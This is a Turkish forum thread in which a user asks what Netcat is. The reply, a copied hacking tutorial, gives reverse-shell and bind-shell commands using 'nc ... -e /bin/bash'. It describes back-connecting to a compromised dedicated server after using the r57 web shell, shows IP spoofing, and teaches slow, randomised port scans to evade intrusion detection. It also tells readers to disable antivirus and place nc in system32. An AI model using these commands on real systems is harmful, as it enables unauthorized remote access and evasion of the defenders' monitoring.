Şimdi Ara

Net Cat Nedir? Bilgisi Olan Arkadaşlar Yardımcı Olursa Sevinirim

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
3
Cevap
0
Favori
2.137
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 1
Giriş
Mesaj
  • Net Cat nedir arkadaşlar? Nasıl bir programdır? Ne işe yarar? Hangi meslek sektörlerinde hangi amaçla kullanılır?
    İnternette araştırdım biraz ancak ilgili sayfalarda anlaşılır, net şekilde açıklama bulamadım.
    Bu konu hakkında kısa ve açıklayıcı bilgi verecek var mı? Yada link veya kitap önerisi verebilecek?
    Şimdiden teşekkürler.



  • Netcat Nedir? Ne Amaçla Kullanılır?

    Netcat bir telnet clientidir.

    iLK OLARAK Unix türevli işletim sistemlerinde kullanılmaya başladı ve daha sonradan windows ort***** uygun hale getirildi. Genelde bu program bir sistemde backdoor açıldıktan sonra oraya bağlantı kurmak amaçlı kullanılır. Diyelim bir sistemde 2121 portunu açtınız o porta pcnizden netcat ile bağlanmak için Başlat/çalıştıra gelip nc –v –l –p <bağlanacağınız port numarası> yazıp bağlanabilirsiniz. Şimdi netcat için kullanacağımız fazla üzerinde durulmayan ama işinize yarayacak diğer komutlara değinelim. Bir sunucuya bağlanmak için ncwww.site.com <port> şeklinde bağlanabilirsiniz. Bir sunucuda birden fazla porta bağlanmak için ncwww.site.com <port> <port> komutunu kullanabilirsiniz. Bir shell hesabına bağlanmak için nc ipadresi <port> –e /bin/bash komutunu kullanabilirsiniz. Shelle bağlandıktan sonra bir portu dinlemek için nc –v –l –p <port> –e /bin/bash komutunu kullanabilirsiniz. Bir host üzerinde port taraması yapmak için nc –v –zwww.site.com <port> <port> komutunu kullanabilirsiniz. Bir routerdan bağlanıyorsanız uzak bir sunucuyla bağlantı kurmak isterseniz nc –g <ağ geçit yolu> remote_host <port> komutunu kullanabilirsiniz. IP spoofing yapmak istiyorsanız nc –s spoof yapılcak ip remote_host port komutunu kullanabilirsiniz. Netcatla dosya transferi yapmak mümkün nc –v <site adresi> <port> > <dosya yolu> komutunu kullanabilirsiniz. Özellikle hacking işlemleri için kullanılan yöntemlerden biriside bir dedicateda girdikten sonra ona dışarıdan kolaylıkla erişim sağlamaktır.Rooting işlemi amaçlanmaktadır. Bu amaçla çeşitli uygulamalar gerçekleştirebilir ancak firewall gibi güvenlik önlemleri olduğu sürece pek başarılı olunamaz. İşte bize bu durumlarda reverse telnet dediğimiz uzaktaki sunucuyu kendimize bağlamak özelliğini içeren netcat işlemini yapmak kalıyor. Sunucudan bir port açtığımızda (aynı portu pcmizde de açıyoruz adsl modem ayarlarından da bunu açmak gerekiyor) bize ordan bağlantı kurulması için sabit bir ipye ihtiyacımız oalcaktır onudawww.no-ip.com adresinden alacağınız iple yapabilirsiniz çalıştıra nc bizim_ip_adresimiz <açılan port numarası> -e /bin/bash komutunu çalıştırdığımızda işlemin 1. kısmı tamamlanmış olur daha sonra kendi pcmizde çalıştıra nc -vv -l -p <açılan port numarası> komutu ile dedicatedımıza bağlanıyoruz. * Önceden konuşmuştuk,RFI konusunda back connect yaparken netcat lazım unutmadan back connect'in portu 2121 'dir bir başka konuda back connecti öğreticem. alıntıdır.http://www.vulnwatch.org/netcat/nc111nt.zip Antivirüslerinizi disable haline getirin.ve bunu windows/system'in içine atın dosyaları açıp olmazsa system32 e attıktan sonra bilenler için backconnect yapmak için netcat gerekli r57 den 2121 portuna basıyoruz hemen çalıştıra geliyoruz nc -vv -l -p 2121 tamam..Backconnect anlatımı yakında. Code: --Netcat ile İz Bırakmadan Port Taramak--
    İlk iş olarak Netcat ,hedef sistemdeki tüm port aralıklarına bağlanır. [root@geek nc]# ./nc target 20 – 80 Bu çalışmaz.Hatırlayın netcat bir port scanner değil demiştik.Bu durumda; netcat 80. porttan başlar ve cevap veren portlarla Tcp bağlantıları yapmaya çalışır.Sonunda bir porttan cevap aldığında devam edebilmek için standart cevabın gelmesini bekler.Bu bizim istediğimiz durum değildir. “-z” seçeneği çözüm yolumuzdur.Bu seçenek(parametre) ile en minimum derecede bir veri gönderilir.Bu veri ile birlikte açık porttan cevap alabiliriz.Bu sayede beklemelerden kurtuluruz. Verbose (-v) parametresi ile ise daha detaylı bağlantılar kurabiliriz.Bu parametre olmayınca gerçeği söylemek gerekirse fazla bir şey öğrenemeyiz. [root@geek nc]# ./nc -z 192.168.1.100 20-80 [root@geek nc]# ./nc -v -z 192.168.1.100 20-80 geek [192.168.1.100] 80 (www) open geek [192.168.1.100] 23 (telnet) open geek [192.168.1.100] 22 (ssh) open geek [192.168.1.100] 21 (ftp) open [root@geek nc]# -v parametresi kullandığımızda hedef sistemin normal servis hizmetlerini sunan portların durumu görebilmekteyiz.Peki bizim bu tarama işlemimiz hedef sistem loglarında nasıl gözükür?Şöyle; July 16 16:15:12 geek sshd[21690] : Did not receive ident string from 192.168.1.105 July 16 16:15:12 geek telnetd[21689] : ttloop: read: Broken pipe July 16 16:15:12 geek ftpd[21691] : FTP session closed Gördüğünüz gibi hedef sistemde iz bırakmışız.Eğer daha geniş port aralıkları taratsaydık.Bu izimiz aynı oranda çoğalırdı.Hele sshd gibi servisler tarayan sistemin IP adresinide kayıt altına alır. Hiçbir şey çalışmayan bir portu bile taratsak kimi sistemlerde bulunan intrusión sistemleri bu anormal durumundan kıllanır ve yöneticisine rapor verir.Ayrıca bazı firewall uygulamalarıda IP numarasını otomatik olarak bloklayabilir. İşte bu makale burada devreye giriyor.(ÇN:En sonunda J) -i parametresiyle bu sorunu aşmak mümkün.Böylelikle zaman aralıkları oluşturarak tarama yapabiliriz.Biraz fazla zaman almasına rağmen radarın dışında durmamızı sağlıyor. Eğer –r parametresini kullanırsak Netcat rastgele bir formda tarar.Böylelikle işlem port tarama işlemi gibi gözükmemesi sağlanır.
    ./nc -v -z -r -i 42 192.168.1.100 20-80 Bu komut ile 20 ile 80 arasındaki rastgele bir port aralığında, her 42sn 192.168.1.100 IP’li adrese bağlantı kurmaya çalışır.Bu yöntem ile otomat defans sistemlerini aşabilirsiniz.Ama yine de hedef sistem kayıtlarına geçer ama düzgün bir sırada işlemler listelenmez. İz bırakmadan tarama yapmanın bir değişik yoluda UDP kullanmaktır. –u paramatresini komutunuza ekleyerek TCP yerine UDP portları taranmış olur. Not1:UDP protokolü ile tarama yapmak problemlidir.Netcat UDP portlarının açık veya kapalı olmasını anlaması ICMP bağlıdır. Eğer ICMP bir firewall ya da filtre tarafından bloklanmışsa Netcat sonuçları yanlış çıkar. Netcat sofistike bir port scanner değildir.

    Not2: Eğer tarama yaparken hatalar alıyorsanız –s ve –p parametreleriyle IP ve portları spesifik olarak belirleyin.Ya da 1024’ten düşük veya bir servis tarafından kullanılmayan bir port seçin.


    (GENELLİKLE HACKERLER KULLANIR)




  • 
Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.